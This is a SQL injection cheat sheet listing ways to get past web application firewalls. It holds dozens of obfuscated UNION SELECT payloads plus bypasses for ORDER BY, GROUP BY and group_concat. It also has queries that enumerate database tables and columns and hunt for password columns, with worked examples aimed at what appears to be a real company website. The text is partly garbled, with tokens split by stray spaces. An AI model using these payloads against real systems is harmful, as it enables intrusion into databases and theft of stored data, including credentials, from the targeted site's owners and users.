sqli waf

WAF Bypass Cheat Sheet Union Select +union+distinct+select+ +union+distinctROW +select+ /**//*!12345UNION SELECT*//**/ /**//*!50000UNION SELECT*//**/ +/*!50000UnIoN*/ /*! 50000SeLeCt aLl*/+ +/*!u%6eion*/+/*!se %6cect*/+ /**/uniUNIONon/**/ aALLll/**/selSELECTect/ **/ 1%')and(0)union(select (1),version(),3,4,5,6)% 23%23%23 /*!50000%55nIoN*/+/*! 50000%53eLeCt*/ union /*!50000%53elect*/ %55nion %53elect +--+Union+--+Select+-- + +UnIoN/*&a=*/SeLeCT/ *&a=*/ id=1+?UnI?On?+'SeL? ECT? id=1+'UnI'||'on'+SeLeCT' UnIoN SeLeCt CoNcAt (version())-- uNiOn aLl sElEcT uUNIONnion all sSELECTelect /*union*/union/*select*/ select+1,2,3/* /*uniXon*/union/ *selXect*/select+1,2/* un/**/ion+sel/**/ect + #1q%0Aunion all#qa %0A#%0Aselect union /*!select*/+ union/**/select/**/ /**/union/**/select/**/ /**/union/*! 50000select*/ /**//*!12345UNION SELECT*//**/ /**//*!50000UNION SELECT*//**/ /**/uniUNIONon/**/ selSELECTect/**/ /**/uniUNIONon/**/ aALLll/**/selSELECTect/ **/ /**//*!union*//**//*! select*//**/ /**/UNunionION/**/ SELselectECT/**/ /**//*UnIOn*//**// *SEleCt*//**/ /**//*U*//*n*//*I*// *O*//*n*//**//*S*// *E*//*l*//*e*//*C*// *t*//**/ /**/UNunionION/**/all/ **/SELselectECT/**/ /**//*UnIOn*//**/all/ **//*SEleCt*//**/ /**//*U*//*n*//*I*// *O*//*n*//**//*all*// **//*S*//*E*//*l*// *e*//*C*//*t*//**/ uni %20union%20/*!select*/ %20 union%23aa%0Aselect union+distinct+select+ union+distinctROW+select + /*!20000%0d%0aunion*/ +/*!20000%0d%0aSel Ect*/ %252f%252a*/UNION %252f%252a /SELECT %252f%252a*/ %23sexsexsex%0AUnIOn %23sexsexsex%0ASeLecT + /*!50000UnIoN*/ /*! 50000SeLeCt aLl*/+ /*!u%6eion*/+/*!se %6cect*/+ 1%?)and(0)union(select (1),version(),3,4,5,6)% 23%23%23 /*!50000%55nIoN*/+/*! 50000%53eLeCt*/ union /*!50000%53elect*/ +%2F**/+Union/*! select*/ %55nion %53elect +?+Union+?+Select+?+ +UnIoN/*&a=*/SeLeCT/ *&a=*/ uNiOn aLl sElEcT uUNIONnion all sSELECTelect union(select(1),2,3) union (select 1111,2222,3333) union (/*!/**/ SeleCT */ 11) %0A%09UNION%0CS ELECT%10NULL% /*!union*//*?*//*!all*// *?*//*!select*/ union%23foo*%2F*bar %0D%0Aselect%23foo%0D %0A1% 2C2%2C union+sel%0bect +uni*on+sel*ect+ +#1q%0Aunion all#qa %0A#%0Aselect 1,2,3,4,5,6,7,8,9,10%0A#a union(select (1),(2),(3),(4), (5)) UNION(SELECT(co lumn)FROM(table)) id=1+?UnI?On?+?SeL? ECT? id=1+?UnI?||?on? +SeLeCT? union select 1?+%0A,2?+ %0A,3?+%0A etc ? /*!00000Union*/ /*! 00000Select*/ /*!50000%55nIoN*/ /*! 50000%53eLeCt*/ %55nion %53elect %55nion(%53elect 1,2,3)-- - +union+distinct+select+ +union+distinctROW +select+ /**//*!12345UNION SELECT*//**/ /**//*!50000UNION SELECT*//**/ /**/UNION/**//*! 50000SELECT*//**/ /*!50000UniON SeLeCt*/ union /*!50000%53elect*/ + #?uNiOn + #?sEleCt + #?1q %0AuNiOn all#qa %0A#%0AsEleCt /*!%55NiOn*/ /*! %53eLEct*/ /*!u%6eion*/ /*!se %6cect*/ +un/**/ion+se/**/lect uni%0bon+se%0blect %2f**%2funion%2f** %2fselect union%23foo*%2F*bar %0D%0Aselect%23foo%0D %0A REVERSE(noinu)+REVERSE (tceles) /*--*/union/*--*/select/ *--*/ union (/*!/**/ SeleCT */ 1,2,3) /*!union*/+/*!select*/ union+/*!select*/ /**/union/**/select/**/ /**/uNIon/**/sEleCt/ **/ +%2F**/+Union/*! select*/ /**//*!union*//**//*! select*//**/ /*!uNIOn*/ /*!SelECt*/ +union+distinct+select+ +union+distinctROW +select+ uNiOn aLl sElEcT UNIunionON+SELs electECT /**/union/*! 50000select*//**/ 0%a0union%a0select%09 %0Aunion%0Aselect%0A %55nion/**/%53elect uni/*!20000%0d%0auni on*/+/*!20000%0d%0aSel Ect*/ %252f%252a*/UNION %252f%252a /SELECT %252f%252a*/ %0A%09UNION%0CS ELECT%10NULL% /*!union*//*--*//*! all*//*--*//*!select*/ union%23foo*%2F*bar %0D%0Aselect%23foo%0D %0A1% 2C2%2C /*!20000%0d%0aunion*/ +/*!20000%0d%0aSel Ect*/ +UnIoN/*&a=*/SeLeCT/ *&a=*/ union+sel%0bect +uni*on+sel*ect+ +#1q%0Aunion all#qa %0A#%0Aselect union(select (1),(2),(3),(4), (5)) UNION(SELECT(co lumn)FROM(table)) %23xyz%0AUnIOn%23xyz %0ASeLecT+ %23xyz%0A%55nIOn %23xyz%0A%53eLecT+ union(select(1),2,3) union (select 1111,2222,3333) uNioN (/*!/**/ SeleCT */ 11) union (select 1111,2222,3333) +#1q%0AuNiOn all#qa %0A#%0AsEleCt /**//*U*//*n*//*I*// *o*//*N*//*S*//*e*// *L*//*e*//*c*//*T*/ %0A/**//*! 50000%55nIOn*// *yoyu*/all/**/%0A/*! %53eLEct*/%0A/*nnaa*/ +%23sexsexsex%0AUnIOn %23sexsexs ex%0ASeLecT + +union%23foo*%2F*bar %0D%0Aselect%23foo%0D %0A1% 2C2%2C /*!f****U%0d%0aun ion*/+/*!f****U%0d %0aSelEct*/ +%23blobblobblob %0aUnIOn%23blobblobblob %0aSeLe cT+ /*!blobblobblob%0d %0aunion*/+/*! blobblobblob%0d %0aSelEct*/ /union\sselect/g /union\s+select/i /*!UnIoN*/SeLeCT +UnIoN/*&a=*/SeLeCT/ *&a=*/ +uni>on+sel>ect+ +(UnIoN)+(SelECT)+ +(UnI)(oN)+(SeL)(EcT) +?UnI?On?+'SeL?ECT? +uni on+sel ect+ +/*!UnIoN*/+/*! SeLeCt*/+ /*!u%6eion*/ /*!se %6cect*/ uni%20union%20/*! select*/%20 union%23aa%0Aselect /**/union/*! 50000select*/ /^.*union.*$/ / ^.*select.*$/ /*union*/union/*select*/ select+ /*uni X on*/union/*sel X ect*/ +un/**/ion+sel/**/ect+ +UnIOn%0d%0aSeleCt%0d %0a UNION/*&test=1*/ SELECT/*&pwn=2*/ un?+un/**/ion+se/**/ lect+ +UNunionION+SEs electLECT+ +uni%0bon+se%0blect+ %252f%252a*/union%252f %252a /select%252f%252a */ /%2A%2A/union/%2A%2A/ select/%2A%2A/ %2f**%2funion%2f** %2fselect%2f**%2f union%23foo*%2F*bar %0D%0Aselect%23foo%0D %0A /*!UnIoN*/SeLecT+ Union Select by PASS with Url Encoded Method: %55nion(%53elect) union%20distinct%20select union%20%64istinctRO %57%20select union%2053elect %23?%0auion%20?%23? %0aselect %23?zen?%0Aunion all %23zen%0A%23Zen %0Aselect %55nion %53eLEct u%6eion se%6cect unio%6e %73elect unio%6e%20%64istinc %74%20%73elect uni%6fn distinct%52OW s %65lect %75%6e%6f%69%6e %61%6c%6c %73%65%6c %65%63%7 Cheat Sheet of Bypassing Of Order by And Group By order by/**_**/ /*!12345order*/ /*! 12345by*/ ) order by 1-- - ') order by 1-- - ')order by 1%23%23 %')order by 1%23%23 Null' order by 100--+ Null' order by 9999--+ ')group by 99-- - 'group by 119449-- - 'group/**/by/ **/99%23%23 Concat And Group_concat By Pass cheat Sheet :: /*!12345group_concat*/ (/*!12345table_name*/) /*!50000group_concat*/ (/*!50000table_name*/) /*!GrOuP_ConCaT*/() /*!12345GroUP_ConCat*/ () /*!50000gRouP_cOnCaT*/ () /*!50000Gr%6fuP_c %6fnCAT*/() /*!group_concat*/() gRoUp_cOnCAt() group_concat(/*!*/) group_concat(/*! 12345table_name*/) group_concat(/*! 50000table_name*/) /*!group_concat*/(/*! 12345table_name*/) /*!group_concat*/(/*! 50000table_name*/) unhex(hex(group_concat (table_name))) unhex(hex(/*! group_concat*/(/*! table_name*/))) unhex(hex(/*! 12345group_concat*/ (table_name))) unhex(hex(/*! 12345group_concat*/(/*! table_name*/))) unhex(hex(/*! 12345group_concat*/(/*! 12345table_name*/))) unhex(hex(/*! 50000group_concat*/ (table_name))) unhex(hex(/*! 50000group_concat*/(/*! table_name*/))) unhex(hex(/*! 50000group_concat*/(/*! 50000table_name*/))) CONVERT(group_concat (table_name)+USING +latin1) CONVERT(group_concat (table_name)+USING +latin2) CONVERT(group_concat (table_name)+USING +latin3) CONVERT(group_concat (table_name)+USING +latin4) CONVERT(group_concat (table_name)+USING +latin5) convert(group_concat (table_name)+using+ascii) convert(group_concat(/*! table_name*/)+using +ascii) convert(group_concat(/*! 12345table_name*/ )+using+ascii) convert(group_concat(/*! 50000table_name*/ )+using+ascii) /*!concat_ws(0x3a,)*/ concat_ws(0x3a3 a3a,version() CONCAT_WS(CHAR( 32,58,32),version(),) How to By Pass Tables::: group_concat(/*! table_name*/) +/*!froM*/ /*! InfORmaTion_sc Hema*/.tAblES? - /*!froM*/ /*! InfORmaTion_sc Hema*/.tAblES /*! WhERe*//*! TaBle_ScHEmA*/=schEMA ()? /*!From*/+ %69nformation_schema./ **/tAblES+/*! 50000Where*/+/*! %54able_ScHEmA*/ =schEMA()? - How to By Pass Columns::: group_concat(/*! column_name*/) +/*!froM*/ InfORmaTion_scHema.cOlumnS /*!WheRe*/ /*! tAblE_naMe*/=hex table /*!From*/+ %69nformation_schema./ **/columns+/*! 50000Where*/+/*! %54able_name*/=hex table/*!froM*/ table? - URL enCoded By passing Table and columns:: (select+group_concat(/*! table_name*/)+/*!From*/ +%69nformation_schema./ **/tAblES+/*! 50000Where*/+/*! %54able_ScHEmA*/ =schEMA()) (select+group_concat(/*! column_name*/)+/*! From*/+%69nformation_s chema./**/columns+/*! 50000Where*/+/*! %54able_name*/=hex table) like http://www.marinaplast. com/page.php?id=-13 union select 1,2,(select +group_concat(/*! table_name*/)+/*!From*/ +%69nformation_schema./ **/tAblES+/*! 50000Where*/+/*! %54able_ScHEmA*/ =schEMA()),4,5 ? illegal mix of Collations ByPass :: unhex(hex(Concat (Column_Name,0 x3e,Table_schem a,0x3e,table_Name))) /*!from*/ information_sche ma.columns/*!where*/ column_name%20/*!like*/ char(37,%20112,%2097, %20115,%20115,%2037) http://www.marinaplast. com/page.php?id=-13 union select 1,2,unhex(hex (Concat(Column_Na me,0x3e,Table_s chema,0x3e,tabl e_Name))),4,5 /*!from*/ information_sche ma.columns/*!where*/ column_name%20/*!like*/ char(37,%20112,%2097, %20115,%20115,%2037)?